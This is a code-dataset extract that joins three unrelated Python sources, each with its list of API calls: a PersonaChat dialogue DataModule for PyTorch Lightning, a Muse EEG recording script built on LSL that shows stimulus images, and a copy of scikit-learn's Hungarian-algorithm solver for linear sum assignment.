:param tokenizer: Model Tokenizer.
"""
def __init__(self, hparams: Namespace, tokenizer: Tokenizer):
super().__init__()
self.hparams = hparams
self.tokenizer = tokenizer
@classmethod
def build_input(
cls,
tokenizer: Tokenizer,
persona: List[List[int]],
history: List[List[int]],
reply: List[int] = [],
lm_labels: bool = False,
) -> Dict[str, List[int]]:
"""Builds a model input.
:param persona: List of persona sentences tokenized.
        :param history: List of history sentences tokenized.
:param reply: Tokenized answer.
:param lm_labels: Flag to build LM labels for ground-truth replies.
:return: Dictionary with model inputs.
"""
bos, eos, speaker1, speaker2 = (
tokenizer.bos_index,
tokenizer.eos_index,
tokenizer.speaker1_index,
tokenizer.speaker2_index,
)
sequence = (
[[bos] + list(chain(*persona))] # concats all persona sentences
+ history # concats history
+ [reply + [eos]] # concats reply
)
sequence = [sequence[0]] + [
[speaker2 if (len(sequence) - i) % 2 else speaker1] + s
for i, s in enumerate(sequence[1:])
]
instance = {
"input_ids": list(chain(*sequence)),
"token_type_ids": [
speaker2 if i % 2 else speaker1
for i, s in enumerate(sequence)
for _ in s
],
}
instance["mc_token_ids"] = len(instance["input_ids"]) - 1
instance["lm_labels"] = [-100] * len(instance["input_ids"])
if lm_labels:
instance["lm_labels"] = (
([-100] * sum(len(s) for s in sequence[:-1]))
+ [-100]
+ sequence[-1][1:]
)
return instance
def _tokenize(self, obj):
if isinstance(obj, str):
return self.tokenizer.encode(obj)
if isinstance(obj, dict):
return dict((k, self._tokenize(o)) for k, o in obj.items())
return list(self._tokenize(o) for o in obj)
def _get_dataset(
self,
dataset_path: str = "",
data_folder: str = "data/",
):
"""Downloads PersonaChat corpus from S3 if no dataset_path is provided.
:param dataset_path: Path to a json file containing the train and validation dataset.
:param data_folder: Folder used to store data.
:return: Returns a dictionary with the training and validation data.
"""
if not os.path.isfile(dataset_path):
click.secho(f"Download dataset from {PERSONACHAT_URL}", fg="yellow")
dataset_file = download_file_maybe_extract(
PERSONACHAT_URL,
directory=data_folder,
check_files=["personachat_self_original.json"],
)
dataset_path = "data/personachat_self_original.json"
dataset_hash = (
int(hashlib.sha256(dataset_path.encode("utf-8")).hexdigest(), 16) % 10 ** 8
)
# To avoid using cache for different models
# split(/) for microsoft/DialoGPT-small
pretrained_model = (
self.hparams.pretrained_model.split("/")[1]
if "/" in self.hparams.pretrained_model
else self.hparams.pretrained_model
)
dataset_cache = data_folder + ".dataset_" + str(dataset_hash) + pretrained_model
if os.path.isfile(dataset_cache):
click.secho(f"Loading tokenized dataset from cache: {dataset_cache}.")
return torch.load(dataset_cache)
else:
dataset_file = dataset_path
with open(dataset_file, "r", encoding="utf-8") as f:
dataset = json.loads(f.read())
click.secho("Running tokenization: This might take some time!", fg="yellow")
dataset = self._tokenize(dataset)
torch.save(dataset, dataset_cache)
return dataset
@classmethod
def pad_dataset(
cls, dataset: dict, padding: int = 0, padded_inputs: List[str] = PADDED_INPUTS
):
"""
Pad the dataset.
NOTE: This could be optimized by defining a Dataset class and
padding at the batch level, but this is simpler.
:param dataset: Dictionary with sequences to pad.
:param padding: padding index.
:param padded_inputs:
"""
max_l = max(len(x) for x in dataset["input_ids"])
for name in padded_inputs:
dataset[name] = [
x + [padding if name != "lm_labels" else -100] * (max_l - len(x))
for x in dataset[name]
]
return dataset
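    # A small illustration (not from the original source) of how pad_dataset behaves with
    # pad index 0: every padded input is right-padded to the longest "input_ids" entry,
    # and "lm_labels" is padded with -100 instead of the pad index:
    #   >>> DataModule.pad_dataset(
    #   ...     {"input_ids": [[1, 2], [3]], "lm_labels": [[1, 2], [3]],
    #   ...      "token_type_ids": [[7, 7], [7]]},
    #   ...     padding=0,
    #   ... )
    #   {'input_ids': [[1, 2], [3, 0]], 'lm_labels': [[1, 2], [3, -100]],
    #    'token_type_ids': [[7, 7], [7, 0]]}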
def prepare_data(self):
"""
Lightning DataModule function that will be used to load/download data,
build inputs with padding and to store everything as TensorDatasets.
"""
personachat = self._get_dataset(self.hparams.dataset_path)
click.secho("Building inputs and labels.", fg="yellow")
datasets = {"train": defaultdict(list), "valid": defaultdict(list)}
for dataset_name, dataset in personachat.items():
num_candidates = len(dataset[0]["utterances"][0]["candidates"])
if self.hparams.num_candidates > 0 and dataset_name == "train":
num_candidates = min(self.hparams.num_candidates, num_candidates)
for dialog in dataset:
persona = dialog["personality"].copy()
for _ in range(self.hparams.personality_permutations):
for utterance in dialog["utterances"]:
history = utterance["history"][
-(2 * self.hparams.max_history + 1) :
]
for j, candidate in enumerate(
utterance["candidates"][-num_candidates:]
):
lm_labels = bool(j == num_candidates - 1)
instance = self.build_input(
self.tokenizer, persona, history, candidate, lm_labels
)
for input_name, input_array in instance.items():
datasets[dataset_name][input_name].append(input_array)
datasets[dataset_name]["mc_labels"].append(num_candidates - 1)
datasets[dataset_name]["n_candidates"] = num_candidates
persona = [persona[-1]] + persona[:-1] # permuted personalities
click.secho("Padding inputs and building tensors.", fg="yellow")
tensor_datasets = {"train": [], "valid": []}
for dataset_name, dataset in datasets.items():
dataset = self.pad_dataset(dataset, padding=self.tokenizer.pad_index)
for input_name in MODEL_INPUTS:
tensor = torch.tensor(dataset[input_name])
# MC labels contain the labels within the batch!
                # That's why we have to split the data according to those batches.
if input_name != "mc_labels":
tensor = tensor.view(
(-1, datasets[dataset_name]["n_candidates"]) + tensor.shape[1:]
)
tensor_datasets[dataset_name].append(tensor)
self.train_dataset = TensorDataset(*tensor_datasets["train"])
self.valid_dataset = TensorDataset(*tensor_datasets["valid"])
click.secho(
"Train dataset (Batch, Candidates, Seq length): {}".format(
self.train_dataset.tensors[0].shape
),
fg="yellow",
)
click.secho(
"Valid dataset (Batch, Candidates, Seq length): {}".format(
self.valid_dataset.tensors[0].shape
),
fg="yellow",
)
def train_dataloader(self) -> DataLoader:
""" Function that loads the train set. """
return DataLoader(
self.train_dataset,
batch_size=self.hparams.batch_size,
shuffle=True,
num_workers=multiprocessing.cpu_count(),
)
def val_dataloader(self) -> DataLoader:
""" Function that loads the validation set. """
return DataLoader(
self.valid_dataset,
batch_size=self.hparams.batch_size,
shuffle=False,
num_workers=multiprocessing.cpu_count(),
)
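
# A minimal, hedged usage sketch (not part of the original module). The Namespace
# attribute names below simply mirror the hparams fields this DataModule reads
# (dataset_path, pretrained_model, num_candidates, personality_permutations,
# max_history, batch_size); how the Namespace and Tokenizer are really constructed
# elsewhere in the project is an assumption here.
#
#   hparams = Namespace(dataset_path="", pretrained_model="gpt2", num_candidates=4,
#                       personality_permutations=2, max_history=2, batch_size=4)
#   tokenizer = Tokenizer("gpt2")  # hypothetical constructor signature
#   dm = DataModule(hparams, tokenizer)
#   dm.prepare_data()
#   train_loader = dm.train_dataloader()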
| [
"itertools.chain",
"click.secho",
"torch.load",
"torch.utils.data.TensorDataset",
"multiprocessing.cpu_count",
"os.path.isfile",
"torch.tensor",
"torchnlp.download.download_file_maybe_extract",
"collections.defaultdict",
"torch.save"
] | [((6207, 6236), 'os.path.isfile', 'os.path.isfile', (['dataset_cache'], {}), '(dataset_cache)\n', (6221, 6236), False, 'import os\n'), ((6534, 6610), 'click.secho', 'click.secho', (['"""Running tokenization: This might take some time!"""'], {'fg': '"""yellow"""'}), "('Running tokenization: This might take some time!', fg='yellow')\n", (6545, 6610), False, 'import click\n'), ((6661, 6695), 'torch.save', 'torch.save', (['dataset', 'dataset_cache'], {}), '(dataset, dataset_cache)\n', (6671, 6695), False, 'import torch\n'), ((7723, 7778), 'click.secho', 'click.secho', (['"""Building inputs and labels."""'], {'fg': '"""yellow"""'}), "('Building inputs and labels.', fg='yellow')\n", (7734, 7778), False, 'import click\n'), ((9343, 9407), 'click.secho', 'click.secho', (['"""Padding inputs and building tensors."""'], {'fg': '"""yellow"""'}), "('Padding inputs and building tensors.', fg='yellow')\n", (9354, 9407), False, 'import click\n'), ((10140, 10180), 'torch.utils.data.TensorDataset', 'TensorDataset', (["*tensor_datasets['train']"], {}), "(*tensor_datasets['train'])\n", (10153, 10180), False, 'from torch.utils.data import DataLoader, TensorDataset\n'), ((10210, 10250), 'torch.utils.data.TensorDataset', 'TensorDataset', (["*tensor_datasets['valid']"], {}), "(*tensor_datasets['valid'])\n", (10223, 10250), False, 'from torch.utils.data import DataLoader, TensorDataset\n'), ((5306, 5334), 'os.path.isfile', 'os.path.isfile', (['dataset_path'], {}), '(dataset_path)\n', (5320, 5334), False, 'import os\n'), ((5348, 5416), 'click.secho', 'click.secho', (['f"""Download dataset from {PERSONACHAT_URL}"""'], {'fg': '"""yellow"""'}), "(f'Download dataset from {PERSONACHAT_URL}', fg='yellow')\n", (5359, 5416), False, 'import click\n'), ((5444, 5563), 'torchnlp.download.download_file_maybe_extract', 'download_file_maybe_extract', (['PERSONACHAT_URL'], {'directory': 'data_folder', 'check_files': "['personachat_self_original.json']"}), "(PERSONACHAT_URL, directory=data_folder,\n check_files=['personachat_self_original.json'])\n", (5471, 5563), False, 'from torchnlp.download import download_file_maybe_extract\n'), ((6250, 6320), 'click.secho', 'click.secho', (['f"""Loading tokenized dataset from cache: {dataset_cache}."""'], {}), "(f'Loading tokenized dataset from cache: {dataset_cache}.')\n", (6261, 6320), False, 'import click\n'), ((6340, 6365), 'torch.load', 'torch.load', (['dataset_cache'], {}), '(dataset_cache)\n', (6350, 6365), False, 'import torch\n'), ((7808, 7825), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (7819, 7825), False, 'from collections import defaultdict\n'), ((7836, 7853), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (7847, 7853), False, 'from collections import defaultdict\n'), ((4035, 4051), 'itertools.chain', 'chain', (['*sequence'], {}), '(*sequence)\n', (4040, 4051), False, 'from itertools import chain\n'), ((9668, 9701), 'torch.tensor', 'torch.tensor', (['dataset[input_name]'], {}), '(dataset[input_name])\n', (9680, 9701), False, 'import torch\n'), ((10896, 10923), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (10921, 10923), False, 'import multiprocessing\n'), ((11194, 11221), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (11219, 11221), False, 'import multiprocessing\n'), ((3671, 3686), 'itertools.chain', 'chain', (['*persona'], {}), '(*persona)\n', (3676, 3686), False, 'from itertools import chain\n')] |
#!/usr/bin/env python
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '2'
import sys
import csv
import numpy as np
import pandas as pd
import random
from time import time, strftime, gmtime, sleep
from optparse import OptionParser
from pylsl import StreamInlet, resolve_byprop
from sklearn.linear_model import LinearRegression
import subprocess
currentpath = os.path.dirname(os.path.realpath(sys.argv[0]))
# dejitter timestamps
dejitter = False
# how long to wait for the Muse device to connect
muse_connect_timout = 5
parser = OptionParser()
parser.add_option("-d", "--duration",
dest="duration", type='int', default=10,
help="duration of the recording in seconds.")
parser.add_option("-p", "--path",
dest="path", type='str',
help="Directory for the recording file.")
parser.add_option("-s", "--sample",
dest="sample", type='str',
help="Record sample for specific term (1/2/3)")
(options, args) = parser.parse_args()
record_sample = False
record_sample_term = None
if options.sample:
record_sample = True
print("NOTICE: Creating sample dataset for term: " + str(options.sample))
record_sample_term = options.sample
else:
print("NOTICE: Creating training dataset with random terms")
if not options.path:
print("ERROR: please use -p to specify the datapath to the recorded csv files!")
sys.exit(1)
fname = (options.path + "/data_%s.csv" % strftime("%Y-%m-%d-%H.%M.%S", gmtime()))
# search for the last word id in eventually already existing datafiles
last_data_file = None
for file in sorted(os.listdir(options.path)):
if file.endswith(".csv"):
if not "eeg_data" in file:
print(os.path.join(options.path, file))
last_data_file = os.path.join(options.path, file)
if last_data_file:
print("Found existing datafiles! Getting currentWord from last datafiles: " + last_data_file)
line = subprocess.check_output(['tail', '-1', last_data_file])
line = str(line)
linesplit = line.split(",")
#print(linesplit[1])
print("Starting currentWord from " + str(linesplit[1]))
currentWord = int(linesplit[1])
currentWord = currentWord + 1
else:
print("Did not found any existing datafiles! Starting currentWord from 1")
currentWord = 1
print("-- currentWord: " + str(currentWord))
eeg_stream = False
print("looking for an EEG stream...")
streams = resolve_byprop('type', 'EEG', timeout=2)
if len(streams) == 0:
print("No EEG stream running yet. Trying to start the Muse EEG stream ...")
eeg_stream = subprocess.Popen([ currentpath + "/bci-stream"])
sleep(muse_connect_timout)
streams = resolve_byprop('type', 'EEG', timeout=2)
if len(streams) == 0:
        raise RuntimeError("Can't find EEG stream")
else:
print("Success: found Muse EEG stream")
print("Start aquiring data")
inlet = StreamInlet(streams[0], max_chunklen=12)
eeg_time_correction = inlet.time_correction()
inlet_marker = False
#print("looking for a Markers stream...")
#marker_streams = resolve_byprop('type', 'Markers', timeout=2)
#if marker_streams:
# inlet_marker = StreamInlet(marker_streams[0])
# marker_time_correction = inlet_marker.time_correction()
#else:
# inlet_marker = False
# print("Cant find Markers stream")
info = inlet.info()
description = info.desc()
freq = info.nominal_srate()
Nchan = info.channel_count()
ch = description.child('channels').first_child()
ch_names = [ch.child_value('label')]
for i in range(1, Nchan):
ch = ch.next_sibling()
ch_names.append(ch.child_value('label'))
# Word Capturing
#currentWord = 1
currentTerm = "1"
t_word = time() + 1 * 2
words = []
terms = []
termBank = ["1", "2", "3"]
subdisplay = False
res = []
timestamps = []
markers = []
t_init = time()
print('Start recording at time t=%.3f' % t_init)
print(currentTerm)
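# Main acquisition loop: roughly every 2 seconds a new term image is displayed, and every
# EEG chunk pulled from the inlet is tagged with the current word counter and the term on
# screen, so samples can later be grouped per stimulus.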
while (time() - t_init) < options.duration:
if time() >= t_word:
if subdisplay:
subdisplay.kill()
# Check for new word
if time() >= t_word:
# sample or training data recording ?
if record_sample:
currentTerm = record_sample_term
else:
currentTerm = random.choice(termBank)
print(str(currentWord) +": " +currentTerm)
subdisplay = subprocess.Popen([ "/usr/bin/display", currentpath + "/images/" + currentTerm + ".png"])
currentWord += 1
t_word = time() + 1 * 2
try:
data, timestamp = inlet.pull_chunk(timeout=1.0, max_samples=12)
if timestamp:
res.append(data)
timestamps.extend(timestamp)
words.extend([currentWord] * len(timestamp))
terms.extend([currentTerm] * len(timestamp))
if inlet_marker:
marker, timestamp = inlet_marker.pull_sample(timeout=0.0)
if timestamp:
markers.append([marker, timestamp])
except KeyboardInterrupt:
break
if subdisplay:
subdisplay.kill()
res = np.concatenate(res, axis=0)
timestamps = np.array(timestamps)
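# When dejittering is enabled, the irregular LSL timestamps are replaced by values from a
# straight-line fit of timestamp against sample index, which assumes an approximately
# constant sampling rate over the recording.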
if dejitter:
y = timestamps
X = np.atleast_2d(np.arange(0, len(y))).T
lr = LinearRegression()
lr.fit(X, y)
timestamps = lr.predict(X)
res = np.c_[timestamps, words, terms, res]
data = pd.DataFrame(data=res, columns=['timestamps'] + ['words'] + ['terms'] + ch_names)
data['Marker'] = 0
# process markers:
for marker in markers:
    # find index of markers
ix = np.argmin(np.abs(marker[1] - timestamps))
val = timestamps[ix]
data.loc[ix, 'Marker'] = marker[0][0]
data.to_csv(fname, float_format='%.3f', index=False)
print('Wrote datafile: ' + fname)
if eeg_stream:
print("Found running EEG stream. Stopping it")
eeg_stream.kill()
print("Success")
| [
"subprocess.check_output",
"numpy.abs",
"os.listdir",
"random.choice",
"pylsl.StreamInlet",
"subprocess.Popen",
"os.path.join",
"optparse.OptionParser",
"pylsl.resolve_byprop",
"time.sleep",
"os.path.realpath",
"numpy.array",
"time.gmtime",
"numpy.concatenate",
"sys.exit",
"pandas.Data... | [((531, 545), 'optparse.OptionParser', 'OptionParser', ([], {}), '()\n', (543, 545), False, 'from optparse import OptionParser\n'), ((2457, 2497), 'pylsl.resolve_byprop', 'resolve_byprop', (['"""type"""', '"""EEG"""'], {'timeout': '(2)'}), "('type', 'EEG', timeout=2)\n", (2471, 2497), False, 'from pylsl import StreamInlet, resolve_byprop\n'), ((2916, 2956), 'pylsl.StreamInlet', 'StreamInlet', (['streams[0]'], {'max_chunklen': '(12)'}), '(streams[0], max_chunklen=12)\n', (2927, 2956), False, 'from pylsl import StreamInlet, resolve_byprop\n'), ((3822, 3828), 'time.time', 'time', ([], {}), '()\n', (3826, 3828), False, 'from time import time, strftime, gmtime, sleep\n'), ((5016, 5043), 'numpy.concatenate', 'np.concatenate', (['res'], {'axis': '(0)'}), '(res, axis=0)\n', (5030, 5043), True, 'import numpy as np\n'), ((5057, 5077), 'numpy.array', 'np.array', (['timestamps'], {}), '(timestamps)\n', (5065, 5077), True, 'import numpy as np\n'), ((5284, 5369), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'res', 'columns': "(['timestamps'] + ['words'] + ['terms'] + ch_names)"}), "(data=res, columns=['timestamps'] + ['words'] + ['terms'] +\n ch_names)\n", (5296, 5369), True, 'import pandas as pd\n'), ((375, 404), 'os.path.realpath', 'os.path.realpath', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (391, 404), False, 'import os\n'), ((1424, 1435), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1432, 1435), False, 'import sys\n'), ((1632, 1656), 'os.listdir', 'os.listdir', (['options.path'], {}), '(options.path)\n', (1642, 1656), False, 'import os\n'), ((1972, 2027), 'subprocess.check_output', 'subprocess.check_output', (["['tail', '-1', last_data_file]"], {}), "(['tail', '-1', last_data_file])\n", (1995, 2027), False, 'import subprocess\n'), ((2618, 2665), 'subprocess.Popen', 'subprocess.Popen', (["[currentpath + '/bci-stream']"], {}), "([currentpath + '/bci-stream'])\n", (2634, 2665), False, 'import subprocess\n'), ((2671, 2697), 'time.sleep', 'sleep', (['muse_connect_timout'], {}), '(muse_connect_timout)\n', (2676, 2697), False, 'from time import time, strftime, gmtime, sleep\n'), ((2712, 2752), 'pylsl.resolve_byprop', 'resolve_byprop', (['"""type"""', '"""EEG"""'], {'timeout': '(2)'}), "('type', 'EEG', timeout=2)\n", (2726, 2752), False, 'from pylsl import StreamInlet, resolve_byprop\n'), ((3691, 3697), 'time.time', 'time', ([], {}), '()\n', (3695, 3697), False, 'from time import time, strftime, gmtime, sleep\n'), ((5166, 5184), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (5182, 5184), False, 'from sklearn.linear_model import LinearRegression\n'), ((3904, 3910), 'time.time', 'time', ([], {}), '()\n', (3908, 3910), False, 'from time import time, strftime, gmtime, sleep\n'), ((3948, 3954), 'time.time', 'time', ([], {}), '()\n', (3952, 3954), False, 'from time import time, strftime, gmtime, sleep\n'), ((4048, 4054), 'time.time', 'time', ([], {}), '()\n', (4052, 4054), False, 'from time import time, strftime, gmtime, sleep\n'), ((4320, 4411), 'subprocess.Popen', 'subprocess.Popen', (["['/usr/bin/display', currentpath + '/images/' + currentTerm + '.png']"], {}), "(['/usr/bin/display', currentpath + '/images/' +\n currentTerm + '.png'])\n", (4336, 4411), False, 'import subprocess\n'), ((5475, 5505), 'numpy.abs', 'np.abs', (['(marker[1] - timestamps)'], {}), '(marker[1] - timestamps)\n', (5481, 5505), True, 'import numpy as np\n'), ((1508, 1516), 'time.gmtime', 'gmtime', ([], {}), '()\n', (1514, 1516), False, 'from time import time, strftime, gmtime, 
sleep\n'), ((1805, 1837), 'os.path.join', 'os.path.join', (['options.path', 'file'], {}), '(options.path, file)\n', (1817, 1837), False, 'import os\n'), ((4223, 4246), 'random.choice', 'random.choice', (['termBank'], {}), '(termBank)\n', (4236, 4246), False, 'import random\n'), ((4452, 4458), 'time.time', 'time', ([], {}), '()\n', (4456, 4458), False, 'from time import time, strftime, gmtime, sleep\n'), ((1742, 1774), 'os.path.join', 'os.path.join', (['options.path', 'file'], {}), '(options.path, file)\n', (1754, 1774), False, 'import os\n')] |
# Hungarian algorithm (Kuhn-Munkres) for solving the linear sum assignment
# problem. Taken from scikit-learn. Based on original code by <NAME>,
# adapted to NumPy by <NAME>.
# Further improvements by <NAME>, <NAME> and <NAME>.
#
# Copyright (c) 2008 <NAME> <<EMAIL>>, <NAME>
# Author: <NAME>, <NAME>
# License: 3-clause BSD
import numpy as np
def linear_sum_assignment(cost_matrix):
"""Solve the linear sum assignment problem.
The linear sum assignment problem is also known as minimum weight matching
in bipartite graphs. A problem instance is described by a matrix C, where
each C[i,j] is the cost of matching vertex i of the first partite set
(a "worker") and vertex j of the second set (a "job"). The goal is to find
a complete assignment of workers to jobs of minimal cost.
Formally, let X be a boolean matrix where :math:`X[i,j] = 1` iff row i is
assigned to column j. Then the optimal assignment has cost
.. math::
\min \sum_i \sum_j C_{i,j} X_{i,j}
    s.t. each row is assigned to at most one column, and each column to at
most one row.
This function can also solve a generalization of the classic assignment
problem where the cost matrix is rectangular. If it has more rows than
columns, then not every row needs to be assigned to a column, and vice
versa.
The method used is the Hungarian algorithm, also known as the Munkres or
Kuhn-Munkres algorithm.
Parameters
----------
cost_matrix : array
The cost matrix of the bipartite graph.
Returns
-------
row_ind, col_ind : array
An array of row indices and one of corresponding column indices giving
the optimal assignment. The cost of the assignment can be computed
as ``cost_matrix[row_ind, col_ind].sum()``. The row indices will be
sorted; in the case of a square cost matrix they will be equal to
``numpy.arange(cost_matrix.shape[0])``.
Notes
-----
.. versionadded:: 0.17.0
Examples
--------
>>> cost = np.array([[4, 1, 3], [2, 0, 5], [3, 2, 2]])
>>> from scipy.optimize import linear_sum_assignment
>>> row_ind, col_ind = linear_sum_assignment(cost)
>>> col_ind
array([1, 0, 2])
>>> cost[row_ind, col_ind].sum()
5
References
----------
1. http://csclab.murraystate.edu/bob.pilgrim/445/munkres.html
2. <NAME>. The Hungarian Method for the assignment problem.
*Naval Research Logistics Quarterly*, 2:83-97, 1955.
3. <NAME>. Variants of the Hungarian method for assignment
problems. *Naval Research Logistics Quarterly*, 3: 253-258, 1956.
4. <NAME>. Algorithms for the Assignment and Transportation Problems.
*J. SIAM*, 5(1):32-38, March, 1957.
5. https://en.wikipedia.org/wiki/Hungarian_algorithm
"""
cost_matrix = np.asarray(cost_matrix)
if len(cost_matrix.shape) != 2:
raise ValueError("expected a matrix (2-d array), got a %r array"
% (cost_matrix.shape,))
# The algorithm expects more columns than rows in the cost matrix.
if cost_matrix.shape[1] < cost_matrix.shape[0]:
cost_matrix = cost_matrix.T
transposed = True
else:
transposed = False
state = _Hungary(cost_matrix)
# No need to bother with assignments if one of the dimensions
# of the cost matrix is zero-length.
step = None if 0 in cost_matrix.shape else _step1
while step is not None:
step = step(state)
if transposed:
marked = state.marked.T
else:
marked = state.marked
return np.where(marked == 1)
class _Hungary(object):
"""State of the Hungarian algorithm.
Parameters
----------
cost_matrix : 2D matrix
The cost matrix. Must have shape[1] >= shape[0].
"""
def __init__(self, cost_matrix):
self.C = cost_matrix.copy()
n, m = self.C.shape
self.row_uncovered = np.ones(n, dtype=bool)
self.col_uncovered = np.ones(m, dtype=bool)
self.Z0_r = 0
self.Z0_c = 0
self.path = np.zeros((n + m, 2), dtype=int)
self.marked = np.zeros((n, m), dtype=int)
def _clear_covers(self):
"""Clear all covered matrix cells"""
self.row_uncovered[:] = True
self.col_uncovered[:] = True
# Individual steps of the algorithm follow, as a state machine: they return
# the next step to be taken (function to be called), if any.
def _step1(state):
"""Steps 1 and 2 in the Wikipedia page."""
# Step 1: For each row of the matrix, find the smallest element and
# subtract it from every element in its row.
state.C -= state.C.min(axis=1)[:, np.newaxis]
# Step 2: Find a zero (Z) in the resulting matrix. If there is no
# starred zero in its row or column, star Z. Repeat for each element
# in the matrix.
for i, j in zip(*np.where(state.C == 0)):
if state.col_uncovered[j] and state.row_uncovered[i]:
state.marked[i, j] = 1
state.col_uncovered[j] = False
state.row_uncovered[i] = False
state._clear_covers()
return _step3
def _step3(state):
"""
Cover each column containing a starred zero. If n columns are covered,
the starred zeros describe a complete set of unique assignments.
In this case, Go to DONE, otherwise, Go to Step 4.
"""
marked = (state.marked == 1)
state.col_uncovered[np.any(marked, axis=0)] = False
if marked.sum() < state.C.shape[0]:
return _step4
def _step4(state):
"""
Find a noncovered zero and prime it. If there is no starred zero
in the row containing this primed zero, Go to Step 5. Otherwise,
cover this row and uncover the column containing the starred
zero. Continue in this manner until there are no uncovered zeros
left. Save the smallest uncovered value and Go to Step 6.
"""
# We convert to int as numpy operations are faster on int
C = (state.C == 0).astype(int)
covered_C = C * state.row_uncovered[:, np.newaxis]
covered_C *= np.asarray(state.col_uncovered, dtype=int)
n = state.C.shape[0]
m = state.C.shape[1]
while True:
# Find an uncovered zero
row, col = np.unravel_index(np.argmax(covered_C), (n, m))
if covered_C[row, col] == 0:
return _step6
else:
state.marked[row, col] = 2
# Find the first starred element in the row
star_col = np.argmax(state.marked[row] == 1)
if state.marked[row, star_col] != 1:
# Could not find one
state.Z0_r = row
state.Z0_c = col
return _step5
else:
col = star_col
state.row_uncovered[row] = False
state.col_uncovered[col] = True
covered_C[:, col] = C[:, col] * (
np.asarray(state.row_uncovered, dtype=int))
covered_C[row] = 0
def _step5(state):
"""
Construct a series of alternating primed and starred zeros as follows.
Let Z0 represent the uncovered primed zero found in Step 4.
Let Z1 denote the starred zero in the column of Z0 (if any).
Let Z2 denote the primed zero in the row of Z1 (there will always be one).
Continue until the series terminates at a primed zero that has no starred
zero in its column. Unstar each starred zero of the series, star each
primed zero of the series, erase all primes and uncover every line in the
matrix. Return to Step 3
"""
count = 0
path = state.path
path[count, 0] = state.Z0_r
path[count, 1] = state.Z0_c
while True:
# Find the first starred element in the col defined by
# the path.
row = np.argmax(state.marked[:, path[count, 1]] == 1)
if state.marked[row, path[count, 1]] != 1:
# Could not find one
break
else:
count += 1
path[count, 0] = row
path[count, 1] = path[count - 1, 1]
# Find the first prime element in the row defined by the
# first path step
col = np.argmax(state.marked[path[count, 0]] == 2)
if state.marked[row, col] != 2:
col = -1
count += 1
path[count, 0] = path[count - 1, 0]
path[count, 1] = col
# Convert paths
for i in range(count + 1):
if state.marked[path[i, 0], path[i, 1]] == 1:
state.marked[path[i, 0], path[i, 1]] = 0
else:
state.marked[path[i, 0], path[i, 1]] = 1
state._clear_covers()
# Erase all prime markings
state.marked[state.marked == 2] = 0
return _step3
def _step6(state):
"""
Add the value found in Step 4 to every element of each covered row,
and subtract it from every element of each uncovered column.
Return to Step 4 without altering any stars, primes, or covered lines.
"""
# the smallest uncovered value in the matrix
if np.any(state.row_uncovered) and np.any(state.col_uncovered):
minval = np.min(state.C[state.row_uncovered], axis=0)
minval = np.min(minval[state.col_uncovered])
state.C[~state.row_uncovered] += minval
state.C[:, state.col_uncovered] -= minval
return _step4
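
# A minimal usage sketch (not part of the original source): calling the local
# implementation directly mirrors the scipy example quoted in the docstring above.
if __name__ == "__main__":
    cost = np.array([[4, 1, 3], [2, 0, 5], [3, 2, 2]])
    row_ind, col_ind = linear_sum_assignment(cost)
    print(col_ind)                       # expected: [1 0 2]
    print(cost[row_ind, col_ind].sum())  # expected: 5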
| [
"numpy.ones",
"numpy.where",
"numpy.asarray",
"numpy.argmax",
"numpy.any",
"numpy.zeros",
"numpy.min"
] | [((2927, 2950), 'numpy.asarray', 'np.asarray', (['cost_matrix'], {}), '(cost_matrix)\n', (2937, 2950), True, 'import numpy as np\n'), ((3713, 3734), 'numpy.where', 'np.where', (['(marked == 1)'], {}), '(marked == 1)\n', (3721, 3734), True, 'import numpy as np\n'), ((6247, 6289), 'numpy.asarray', 'np.asarray', (['state.col_uncovered'], {'dtype': 'int'}), '(state.col_uncovered, dtype=int)\n', (6257, 6289), True, 'import numpy as np\n'), ((4074, 4096), 'numpy.ones', 'np.ones', (['n'], {'dtype': 'bool'}), '(n, dtype=bool)\n', (4081, 4096), True, 'import numpy as np\n'), ((4127, 4149), 'numpy.ones', 'np.ones', (['m'], {'dtype': 'bool'}), '(m, dtype=bool)\n', (4134, 4149), True, 'import numpy as np\n'), ((4217, 4248), 'numpy.zeros', 'np.zeros', (['(n + m, 2)'], {'dtype': 'int'}), '((n + m, 2), dtype=int)\n', (4225, 4248), True, 'import numpy as np\n'), ((4272, 4299), 'numpy.zeros', 'np.zeros', (['(n, m)'], {'dtype': 'int'}), '((n, m), dtype=int)\n', (4280, 4299), True, 'import numpy as np\n'), ((5595, 5617), 'numpy.any', 'np.any', (['marked'], {'axis': '(0)'}), '(marked, axis=0)\n', (5601, 5617), True, 'import numpy as np\n'), ((8001, 8048), 'numpy.argmax', 'np.argmax', (['(state.marked[:, path[count, 1]] == 1)'], {}), '(state.marked[:, path[count, 1]] == 1)\n', (8010, 8048), True, 'import numpy as np\n'), ((8386, 8430), 'numpy.argmax', 'np.argmax', (['(state.marked[path[count, 0]] == 2)'], {}), '(state.marked[path[count, 0]] == 2)\n', (8395, 8430), True, 'import numpy as np\n'), ((9258, 9285), 'numpy.any', 'np.any', (['state.row_uncovered'], {}), '(state.row_uncovered)\n', (9264, 9285), True, 'import numpy as np\n'), ((9290, 9317), 'numpy.any', 'np.any', (['state.col_uncovered'], {}), '(state.col_uncovered)\n', (9296, 9317), True, 'import numpy as np\n'), ((9337, 9381), 'numpy.min', 'np.min', (['state.C[state.row_uncovered]'], {'axis': '(0)'}), '(state.C[state.row_uncovered], axis=0)\n', (9343, 9381), True, 'import numpy as np\n'), ((9400, 9435), 'numpy.min', 'np.min', (['minval[state.col_uncovered]'], {}), '(minval[state.col_uncovered])\n', (9406, 9435), True, 'import numpy as np\n'), ((5032, 5054), 'numpy.where', 'np.where', (['(state.C == 0)'], {}), '(state.C == 0)\n', (5040, 5054), True, 'import numpy as np\n'), ((6432, 6452), 'numpy.argmax', 'np.argmax', (['covered_C'], {}), '(covered_C)\n', (6441, 6452), True, 'import numpy as np\n'), ((6663, 6696), 'numpy.argmax', 'np.argmax', (['(state.marked[row] == 1)'], {}), '(state.marked[row] == 1)\n', (6672, 6696), True, 'import numpy as np\n'), ((7106, 7148), 'numpy.asarray', 'np.asarray', (['state.row_uncovered'], {'dtype': 'int'}), '(state.row_uncovered, dtype=int)\n', 